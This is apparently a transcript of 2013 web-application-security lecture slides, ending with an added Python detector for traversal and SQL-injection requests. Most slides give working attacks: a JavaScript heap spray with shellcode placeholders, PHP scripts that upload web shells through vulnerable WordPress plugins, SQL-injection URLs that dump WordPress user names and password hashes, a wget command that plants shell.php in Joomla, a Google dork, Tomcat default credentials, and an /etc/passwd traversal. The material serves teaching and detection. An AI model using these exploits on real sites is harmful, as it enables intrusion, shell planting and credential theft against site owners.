Web Application Security, autumn 2013, lecture 10
Transcript

  • 1. Heap spray: spray the heap, exploit the bug, profit! The spray can come from JS, VB, ActionScript, HTML5, SGML or SVG: any dynamically supplied content.
  • 2. Heap spray in JavaScript. Resulting layout: heap[slen]: NOPS | shell, heap[slen-1]: NOPS | shell, ..., heap[0]: NOPS | shell
        nops = unescape("%u0D0D%u0D0D");
        shellcode = unescape("%u...");
        heap = new Array();
        for (i = 0; i < slen; i++) {
            heap[i] = nops + shellcode;
        }
        exploit();
  • 3. JIT-compiled constants as code: var a = (0x11223344^0x44332211^0x44332211^ ...);
        As emitted by the compiler:
          0: b8 44 33 22 11        mov $0x11223344,%eax
          5: 35 11 22 33 44        xor $0x44332211,%eax
          a: 35 11 22 33 44        xor $0x44332211,%eax
        The same bytes executed from offset 1:
          1: 44                    inc %esp
          2: 33 22                 xor (%edx),%esp
          4: 11 35 11 22 33 44     adc %esi,0x44332211
          a: 35 11 22 33 44        xor $0x44332211,%eax
  • 4. WordPress checks: admin location /wp-admin/; admin user: admin; plugins: /wp-content/plugins; themes: /wp-content/themes; scanner: nmap http-wordpress-plugins
        nmap --script=http-wordpress-plugins --script-args http-wordpress-plugins.root="/blog/" <target>
  • 5. Exploit: suco theme file upload
        <?php
        $uploadfile = "devilscream.php";
        $ch = curl_init("http://127.0.0.1/wp-content/themes/suco/themify/themify-ajax.php?upload=1");
        curl_setopt($ch, CURLOPT_POST, true);
        curl_setopt($ch, CURLOPT_POSTFIELDS, array('Filedata' => "@$uploadfile"));
        curl_setopt($ch, CURLOPT_RETURNTRANSFER, 1);
        $postResult = curl_exec($ch);
        curl_close($ch);
        print "$postResult";
        ?>
        shell: http://SITE-TARGET/wp-content/themes/suco/uploads/devilscream.php
  • 6. Exploit: wp-realty blind SQL injection
        http://localhost/wordpress/wp-content/plugins/wp-realty/index_ext.php?action=contact_friend&popup=yes&listing_id=[SQLi]
  • 7. Exploit: Complete Gallery Manager 3.3.3 file upload
        <?php
        $uploadfile = "up.php";
        $ch = curl_init("http://target/wordpress/wp-content/plugins/complete-gallery-manager/frames/upload-images.php");
        curl_setopt($ch, CURLOPT_POST, true);
        curl_setopt($ch, CURLOPT_POSTFIELDS, array('qqfile' => "@$uploadfile"));
        curl_setopt($ch, CURLOPT_RETURNTRANSFER, 1);
        $postResult = curl_exec($ch);
        curl_close($ch);
        print "$postResult";
        ?>
  • 8. Exploit: All Video Gallery 1.1 SQL injection
        http://site.com/wp-content/plugins/all-video-gallery/config.php?vid=1&pid=11&pid=1+union+select+1,2,3,4,group_concat(user_login,0x3a,user_pass),6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28,29,30,31,32,33,34,35,36,37,38,39,40,41+from+wp_users--
  • 9. Joomla checks: admin location /administrator/; admin user: admin; components: /components/com_*; component parameter: /?option=com_*; scanner: joomscan
  • 10. Exploit: redSHOP component SQL injection
        http://example.com/index.php?tmpl=component&option=com_redshop&view=product&task=addtocompare&pid=24%22%20and%201=0%20union%20select%201,2,3,4,5,6,7,8,concat_ws%280x203a20,%20user%28%29,%20database%28%29,%20version%28%29%29,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28,29,30,31,32,33,34,35,36,37,38,39,40,41,42,43,44,45,46,47,48,49,50,51,52,53,54,55,56,57,58,59,60,61,62,63%23&cmd=add&cid=20&sid=0.6886686905513422
  • 11. Exploit: com_civicrm component remote code execution
        wget --post-data "<?php phpinfo(); ?>" http://target/administrator/components/com_civicrm/civicrm/packages/OpenFlashChart/php-ofclibrary/ofc_upload_image.php?name=shell.php
  • 12. vBulletin checks: admin location /admincp/; admin user: admin; addons: /
  • 13. Exploit: Yet Another Award SQL injection. Google dork: inurl:awards.php intext:"powered by vbulletin"
        Vulnerable code (note the misspelled TYPE_UNIT, so award_request_uid is never cleaned):
        $vbulletin->input->clean_array_gpc('p', array(
            'award_id' => TYPE_UINT,
            //'award_request_name' => TYPE_STR,
            //'award_request_recipient_name' => TYPE_STR,
            'award_request_reason' => TYPE_STR,
            'award_request_uid' => TYPE_UNIT,
        ));
        $award_request_uid = $vbulletin->GPC['award_request_uid'];
        $db->query_write("INSERT INTO " . TABLE_PREFIX . "award_requests (award_req_uid, award_rec_uid, award_req_aid, award_req_reason) VALUES ('$award_request_uid', '$award_request_uid', '$award[award_id]', '" . $db->escape_string($vbulletin->GPC['award_request_reason']) . "')");
        Request: http://[site].com/request_award.php
        POST: do=submit&name=award_id=[VALID REWARD ID]&award_request_reason=0&award_request_uid=0[SQL]&submit=Submit
  • 14. Exploit: vBulletin 4.1.10 LFI
        http://target/Patch/includes/functions_cron.php?nextitem=[Lfi]
  • 15. Tomcat checks: admin location /admin/ and /manager/; admin user: admin; addons: /
        Default credentials to check: tomcat:tomcat, password:password, admin:admin, admin:password, admin:<nopassword>, tomcat:<nopassword>
  • 16. Exploit: Tomcat < 6.0.18 UTF-8 directory traversal (overlong encoding %c0%ae for ".")
        GET /%c0%ae%c0%ae/%c0%ae%c0%ae/%c0%ae%c0%ae/etc/passwd
  • 17. 5 April 2010, JIRA issue: http://tinyurl.com/XXXXXXXXX. XSS, then obtaining administrative access in JIRA, then a backdoor.
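The overlong-UTF-8 traversal from the Tomcat slide and the UNION SELECT extraction from the WordPress and Joomla slides can both be recognised from the request line alone in an access log. The detector below is an added example, not part of the lecture: the request lines are constructed to mirror the slides' URLs, lenient_decode reproduces only the overlong-form handling that made the Tomcat bypass work (so that the path can be normalised and checked for ".." segments, which also catches plain and %2e-encoded traversal), and the SQLI_RE pattern is a deliberately narrow assumption covering the injections shown on the slides.

```python
import re
from urllib.parse import unquote_to_bytes, unquote_plus

# Constructed request lines modelled on the URLs in the slides (not real traffic).
SAMPLE_REQUESTS = [
    "GET /%c0%ae%c0%ae/%c0%ae%c0%ae/%c0%ae%c0%ae/etc/passwd HTTP/1.1",
    "GET /wp-content/plugins/all-video-gallery/config.php?vid=1&pid=1+union+select+1,2,"
    "group_concat(user_login,0x3a,user_pass)+from+wp_users-- HTTP/1.1",
    "GET /index.php?option=com_redshop&view=product&pid=24%22%20and%201=0%20union%20select%201,2,3%23 HTTP/1.1",
    "GET /wp-content/themes/suco/style.css?ver=3.6 HTTP/1.1",
]

# Assumed signature for the UNION-based extraction used on the WordPress and Joomla slides.
SQLI_RE = re.compile(r"\bunion\b[\s\S]*\bselect\b|\bgroup_concat\s*\(|\bconcat_ws\s*\(", re.I)


def lenient_decode(raw: bytes) -> str:
    """Decode like a permissive UTF-8 decoder that accepts overlong two-byte forms
    (lead byte 0xC0/0xC1), so that %c0%ae becomes '.'. Used only to normalise the
    path the way the vulnerable decoder would, so traversal can be detected."""
    out, i = [], 0
    while i < len(raw):
        b = raw[i]
        if b in (0xC0, 0xC1) and i + 1 < len(raw) and 0x80 <= raw[i + 1] <= 0xBF:
            out.append(chr(((b & 0x1F) << 6) | (raw[i + 1] & 0x3F)))
            i += 2
        else:
            out.append(chr(b) if b < 0x80 else "\ufffd")
            i += 1
    return "".join(out)


def analyze_request(line: str) -> set:
    """Return the set of findings for one access-log request line."""
    findings = set()
    _method, target, _version = line.split(" ", 2)
    path, _, query = target.partition("?")
    raw = unquote_to_bytes(path)
    try:
        raw.decode("utf-8")                  # strict decoding rejects overlong sequences
    except UnicodeDecodeError:
        findings.add("overlong-utf8")
    if ".." in lenient_decode(raw).split("/"):   # any '..' path segment after normalisation
        findings.add("path-traversal")
    if query and SQLI_RE.search(unquote_plus(query)):   # '+' and %20 both become spaces
        findings.add("sqli")
    return findings
```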